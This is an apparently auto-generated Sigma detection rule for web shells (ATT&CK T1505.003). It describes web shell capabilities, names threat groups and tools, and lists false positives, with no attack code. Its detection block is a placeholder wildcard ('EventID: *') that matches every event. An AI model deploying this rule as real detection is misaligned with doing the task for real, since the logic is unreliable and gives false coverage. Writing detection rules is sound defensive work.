title: Web Shell (T1505.003)
id: df00tech-t1505-003
status: experimental
description: "Adversaries install web shells on compromised web servers to maintain persistent access. A web shell is a script (PHP, ASP, ASPX, JSP, etc.) that provides command execution, file upload/download, and network proxying capabilities via HTTP. Web shells are used by dozens of threat groups including APT28, APT39, HAFNIUM, OilRig, GALLIUM, and Sandworm. China Chopper and P.A.S. Webshell are widely-used examples. IcedID, WIREFIRE, and BUSHWALK target specific appliances (Ivanti VPN)."
references:
  - https://attack.mitre.org/techniques/T1505/003/
  - https://df00tech.com/detections/T1505.003
author: df00tech
date: 2026/04/21
tags:
  - attack.t1505.003
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - IIS application pools that legitimately use cmd.exe for application integration (rare but exists in legacy systems)
  - "PHP or JSP applications that use exec() or shell_exec() for legitimate system operations (image processing, file conversion)"
  - Legitimate web deployment pipelines (CI/CD) that write files to web directories as part of automated deployment
  - System administration scripts that run under the IIS application pool identity for configuration management
level: critical